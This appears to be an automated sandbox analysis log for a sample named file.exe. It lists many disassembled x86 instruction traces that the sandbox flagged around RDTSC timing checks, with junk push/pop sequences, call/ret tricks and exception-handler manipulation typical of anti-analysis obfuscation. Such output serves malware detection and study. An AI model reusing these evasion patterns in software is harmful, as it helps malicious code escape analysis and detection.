Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 516C13 second address: 516C1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516DB9 second address: 516E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 5A4D1594h 0x0000000d mov esi, dword ptr [ebp+122D2A0Bh] 0x00000013 push 00000003h 0x00000015 movsx edi, cx 0x00000018 push 00000000h 0x0000001a jmp 00007F5B4C774D93h 0x0000001f push 00000003h 0x00000021 call 00007F5B4C774D99h 0x00000026 and esi, 4B08D850h 0x0000002c pop esi 0x0000002d push 87CEA282h 0x00000032 pushad 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516E11 second address: 516E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c add dword ptr [esp], 38315D7Eh 0x00000013 lea ebx, dword ptr [ebp+12458926h] 0x00000019 mov edi, dword ptr [ebp+122D3303h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007F5B4D24B71Ch 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516E3F second address: 516E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D93h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350C9 second address: 5350F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F5B4D24B716h 0x0000000c jmp 00007F5B4D24B71Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5B4D24B716h 0x0000001a jmp 00007F5B4D24B71Dh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350F6 second address: 535121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F5B4C774DABh 0x0000000d jmp 00007F5B4C774D8Dh 0x00000012 pushad 0x00000013 jmp 00007F5B4C774D8Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A7A second address: 535A96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F5B4D24B720h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535A96 second address: 535AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5B4C774D91h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535AB9 second address: 535ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D9A second address: 535D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D9E second address: 535DAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535DAE second address: 535DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535F17 second address: 535F2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360CC second address: 5360D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536219 second address: 53621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53621F second address: 53624B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F5B4C774D8Fh 0x00000016 popad 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F5B4C774D86h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53624B second address: 536266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B727h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536266 second address: 53627A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5B4C774D86h 0x0000000a jmp 00007F5B4C774D8Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53627A second address: 53627E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2A6 second address: 52C2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2B2 second address: 52C2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2B6 second address: 52C2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2BA second address: 52C2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F5B4D24B71Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C2D6 second address: 52C2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F5B4C774D99h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536A4D second address: 536A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536B9F second address: 536BC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5B4C774D95h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f ja 00007F5B4C774D86h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0DC second address: 53B0E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B6CB second address: 53B6CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E7A8 second address: 53E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5B4D24B726h 0x0000000b jmp 00007F5B4D24B71Ah 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501244 second address: 50125D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007F5B4C774D86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424B7 second address: 5424C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5B4D24B716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424C3 second address: 5424CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5424CC second address: 5424F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F5B4D24B716h 0x00000009 ja 00007F5B4D24B716h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 jmp 00007F5B4D24B724h 0x0000001c pop edi 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F896D second address: 4F8971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545C15 second address: 545C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5B4D24B722h 0x0000000b jmp 00007F5B4D24B71Fh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546079 second address: 546086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546086 second address: 54608C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608C second address: 546095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546095 second address: 546099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546099 second address: 5460A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54634A second address: 546350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546507 second address: 54650B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54666D second address: 546671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546671 second address: 546677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546677 second address: 5466C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 jmp 00007F5B4D24B71Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007F5B4D24B71Ah 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007F5B4D24B71Fh 0x0000001d jo 00007F5B4D24B735h 0x00000023 jmp 00007F5B4D24B729h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5470CD second address: 5470D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547CFE second address: 547D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], ebx 0x0000000a jmp 00007F5B4D24B720h 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007F5B4D24B721h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D2E second address: 547D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5B4C774D86h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jbe 00007F5B4C774D98h 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F5B4C774D86h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547D49 second address: 547D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54805E second address: 548064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54828E second address: 548293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5487D1 second address: 5487D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A32C second address: 54A342 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5B4D24B718h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F5B4D24B716h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A342 second address: 54A346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54A346 second address: 54A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C3E0 second address: 54C3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ABCD second address: 54ABD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D7A1 second address: 54D7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54ABD1 second address: 54ABDB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4D24B716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E315 second address: 54E329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D90h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556AE9 second address: 556AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554AC8 second address: 554B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5B4C774D88h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov dword ptr [ebp+12456F46h], edx 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 push 00000000h 0x0000003a push edi 0x0000003b call 00007F5B4C774D88h 0x00000040 pop edi 0x00000041 mov dword ptr [esp+04h], edi 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc edi 0x0000004e push edi 0x0000004f ret 0x00000050 pop edi 0x00000051 ret 0x00000052 adc bh, FFFFFFE4h 0x00000055 mov eax, dword ptr [ebp+122D0575h] 0x0000005b mov ebx, ecx 0x0000005d push FFFFFFFFh 0x0000005f mov edi, dword ptr [ebp+122D17C2h] 0x00000065 push eax 0x00000066 pushad 0x00000067 push edi 0x00000068 je 00007F5B4C774D86h 0x0000006e pop edi 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 555C57 second address: 555C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B5E second address: 557B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556C8D second address: 556C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557B63 second address: 557BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5B4C774D86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5B4C774D88h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 pushad 0x00000029 jmp 00007F5B4C774D97h 0x0000002e mov di, 7111h 0x00000032 popad 0x00000033 movzx edi, si 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F5B4C774D88h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 push 00000000h 0x00000054 jnl 00007F5B4C774D92h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556C91 second address: 556CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557BEE second address: 557C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D90h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557C03 second address: 557C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5B4D24B716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 556D54 second address: 556D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 557DD5 second address: 557DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558DAF second address: 558E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F5B4C774D86h 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+122D17BBh], eax 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F5B4C774D88h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 call 00007F5B4C774D93h 0x00000048 sbb ebx, 399C7030h 0x0000004e pop edi 0x0000004f mov eax, dword ptr [ebp+122D0CF1h] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push eax 0x0000005a call 00007F5B4C774D88h 0x0000005f pop eax 0x00000060 mov dword ptr [esp+04h], eax 0x00000064 add dword ptr [esp+04h], 00000014h 0x0000006c inc eax 0x0000006d push eax 0x0000006e ret 0x0000006f pop eax 0x00000070 ret 0x00000071 mov ebx, dword ptr [ebp+122D28F3h] 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jl 00007F5B4C774D8Ch 0x00000080 je 00007F5B4C774D86h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559B99 second address: 559B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AA8B second address: 55AB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b jno 00007F5B4C774D8Ch 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F5B4C774D88h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d add dword ptr [ebp+1246972Ah], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F5B4C774D88h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f jmp 00007F5B4C774D97h 0x00000054 mov bl, BFh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push ecx 0x0000005a jmp 00007F5B4C774D8Ah 0x0000005f pop ecx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB4 second address: 559DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB16 second address: 55AB1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB8 second address: 559DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB1C second address: 55AB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DBC second address: 559DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DC2 second address: 559DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ACCE second address: 55ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55BE76 second address: 55BE90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4C774D96h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55ACD4 second address: 55ACE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F5B4D24B716h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55CB8F second address: 55CB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55EC82 second address: 55EC86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
